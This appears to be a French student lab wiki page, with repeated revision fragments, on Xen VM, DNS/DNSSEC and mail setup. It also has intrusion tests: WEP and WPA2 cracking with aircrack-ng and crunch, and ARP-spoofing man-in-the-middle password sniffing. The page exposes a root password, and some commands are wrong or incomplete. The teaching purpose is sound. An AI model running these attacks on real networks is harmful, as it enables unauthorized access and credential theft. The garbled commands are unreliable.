On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

TP sysres IMA2a5 2020/2021 G5

2020-11-20T08:20:51Z

Aglaine : /* Réception d'un message */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]
 

on constate que on resoit bien les message en provenance du mail de Polytech.

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

TP sysres IMA2a5 2020/2021 G5

2020-11-20T08:20:30Z

Aglaine : /* Installation d'une méchagerie */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

